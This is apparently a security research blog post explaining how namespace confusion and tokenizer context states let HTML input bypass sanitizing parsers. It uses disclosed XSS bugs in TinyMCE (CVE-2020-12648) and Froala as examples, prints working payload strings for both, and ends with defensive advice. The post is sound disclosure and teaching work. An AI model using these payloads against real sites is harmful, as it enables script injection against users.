Introduction to Key Concepts
Cross-site Scripting (XSS) Protections
What if users require the ability to include some HTML such as images, links, and rich text? This is where lexical parsing comes into play.
Cross-site Scripting (XSS) Protections via Lexical Parsing
Some examples that allow a subset of HTML by design are rich-text editors, email clients, What-You-See-Is-What-You-Get (WYSIWYG) HTML editors like TinyMCE or Froala, and sanitization libraries such as DOMPurify. Among these examples, this form of lexical parsing protection is commonplace.
How the Data Flows Through the HTML Parser
To understand how we can achieve XSS in an application that uses lexical analysis on HTML input, we first must look at how HTML is parsed and how content is determined to be either data or instructions. The figure below is a visualization of the HTML parser's order of operations:
The steps in this visualization are as follows:
- Network – This stage refers to the transfer of input as bytes to the parser.
- Tokenizer – Tokenization is where the lexical parsing occurs. The parser will separate text data from computer instructions. To do this, the tokenizer will switch contexts between data states depending on the element it encounters and return the values as tokens. This is covered in more detail in the Context State section.
- Tree Construction – The tokens returned from the tokenization stage are placed in a tree structure; each of the tree branches is known as a node. For a clearer picture of what this looks like in practice, let's examine the following HTML snippet:
The figure below shows what this looks like in the document object model (DOM) tree structure:
<!DOCTYPE html> <body> <div> Hello World <a href=https://bishopfox.com>Example</a></div> </body>
Our goal as an attacker is to control the node in this stage of HTML parsing. As my mentor Joe DeMesy once described it to me, if you can control a node's context and content, you will have XSS.
- DOM – The end state of the processing where the document object model is built.
Now you should have a high-level understanding of how data flows through the HTML parsing process and how the information is organized, which will come into play during exploitation.
The Concept of the HTML Parser's Context State
tokenization stage, the HTML parser will sort the HTML elements into different categories of data states known as the Context State. The HTML specification lists the Context State switching elements as follows:
Set the state of the HTML parser's tokenization stage as follows, switching on the context element:
Switch the tokenizer to the RCDATA state.
Switch the tokenizer to the RAWTEXT state.
Switch the tokenizer to the script data state.
If the scripting flag is enabled, switch the tokenizer to the RAWTEXT state. Otherwise, leave the tokenizer in the data state.
Switch the tokenizer to the PLAINTEXT state.
Any other element
Leave the tokenizer in the data state.
The visualization below shows what some of these context states look like in practice:
Screenshot of output:
Screenshot of output:
Note that the data state is the only state that attempted to load an image. This is because data is a computer instruction and not simply text data.
Different supplied elements alter how data in those elements is parsed and rendered by switching the Context State of the data.
Namespaces – Foreign Content and Leveraging the Unexpected Behavior
The browser’s HTML parser understands more than just HTML; it can switch between three distinct namespaces: HTML, MathML, and SVG.
During HTML parsing, if either a <svg> or <math> namespace element (tag) is encountered, the parser will switch context to the respective namespace. What this context switch means to us is the parser is no longer parsing as HTML but rather MathML or SVG.
This namespace context switch results in unexpected behavior when HTML is embedded in MathML/SVG, as each namespace has its own distinct elements and parses slightly differently. As penetration testers, we can exploit this logic in some instances to confuse the parser into allowing XSS.
Michał Bentkowski's DOMPurify bypass writeup provides a more in-depth look on namespace confusion, including cutting-edge research and a great example.
The HTML parser will context switch to separate namespaces when it encounters MathML or SVG elements, which can be used to confuse the parser.
Sanitizing Lexical Parsing Flow
To exploit sanitizing lexical parsers, we need to understand the general flow of how they work. At a high level, the general flow is as follows:
- User-supplied data is parsed as HTML by the browser's HTML parser
- The data is parsed and sanitized by the lexical parser
- The data is parsed again by the browser's HTML parser
This flow is depicted below:
The goal of exploitation is to provide HTML that will trick the sanitizing parser into believing the provided input is non-dangerous text data (RCDATA, PLAINTEXT, or RAWTEXT) when it is actually computer instructions (data state). This is often possible for several reasons: HTML is not designed to be parsed twice; slight variations in parsing can occur between the initial HTML parser and the sanitizing parser; and sanitizing parsers often implement their own processing logic.
Test Case 1 = TinyMCE XSS
CVE-2020-12648 (XSS in TinyMCE), which was discovered by George Steketee and I, will serve as a test case for how HTML parsing caveats can be leveraged to gain XSS in cases where a sanitizing parser is used. In the TinyMCE advisory, XSS was achieved with the following payload:
<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
This payload was successful because of an issue in the tokenization and tree construction phases. In particular, when the HTML was reparsed by the lexical parser, it did not properly account for the order of elements before assigning the context state.
The <iframe> element caused the context state to switch to RAWTEXT, which meant that the data following the iframe was considered not dangerous and did not require sanitization. This context switch ended at the closing tag of </iframe>. However, the <textarea> element also instructed the parser to switch to the RCDATA context, another form of non-dangerous text data. The context switch to RCDATA was contained within the iframe elements when they were processed by the HTML parser. This containment is what the TinyMCE parser failed to realize.
When this was parsed, the TinyMCE parser failed to consider the proper order of operations and context switches. Therefore, the DOM tree construction performed by the final post-sanitization HTML parser looked like this:
The above was a result of TinyMCE's parser viewing the data incorrectly like this:
Test Case 2 = Froala XSS
<math><iframe><!--</iframe><img src onerror=alert("XSS")>
This payload is functionally the same as the TinyMCE XSS discussed in Test Case 1 of this blog post with one caveat. Entering the MathML namespace to cause parsing confusion (in Froala's instance, restricting a comment within iframe elements) was not enough to confuse the Froala parser. However, Froala's parser did not understand MathML namespace tags and would drop the tags but continue parsing the remaining content. The result was the HTML parser creating nodes with the payload restricted to text data, as shown in the tree below:
The result was the XSS payload execution. This can be further visualized by examining the post-exploitation source code:
<iframe><!--</iframe> <img src="" onerror="alert("XSS")" style="" class="fr-ficfr-dii"> -->
The Froala parser removed the <math> element and added a --> to close what it believed was a comment. The final-stage HTML parser viewed the opening comment as contained within iframe elements and set the closing comment element added by the Froala parser to the RCDATA state, ignoring it as a valid closing tag. The result was active content execution (XSS).
When implementing applications that allow some user-controlled HTML by design, the key to avoiding these types of bugs is to process the HTML as close to the original parse as possible. While doing so, it is important to account for the order of elements and embed the elements’ context. These XSS issues within lexical analysis will arise if there is a variation in how the HTML parser views a node versus how the sanitizing parser views a node. It is also advisable to blacklist MathML and SVG namespace elements when they are not required and completely drop any request containing these (i.e., do not continue to write the data into the DOM).
For organizations that are not creating these types of solutions but rather including them in their applications, a good patch policy will go a long way in preventing exploitation. I recommend checking for the latest versions of these libraries and patching them on a regular and organizationally defined basis.
Even when input is lexically analyzed, XSS may still be possible by exploiting caveats in how HTML is parsed and reparsed by whatever sanitization library is in use. When testing for this type of XSS, I recommend fuzzing inputs with various namespace and context switching elements, recording any interesting results, and working off those results.
Whatwg - HTML Specification
W3 – HTML Parser Working Draft
Securitum - DOM Purify Bypass
Bishop Fox – TinyMCE v5.2.1 Advisory
Hixie – DOM Tree viewer
Techopedia – Lexical Analysis Defined
PortSwigger – Preventing XSS
OWASP – Contextual Output encoding
Mozilla – Content Security Policy
CSP – CSP details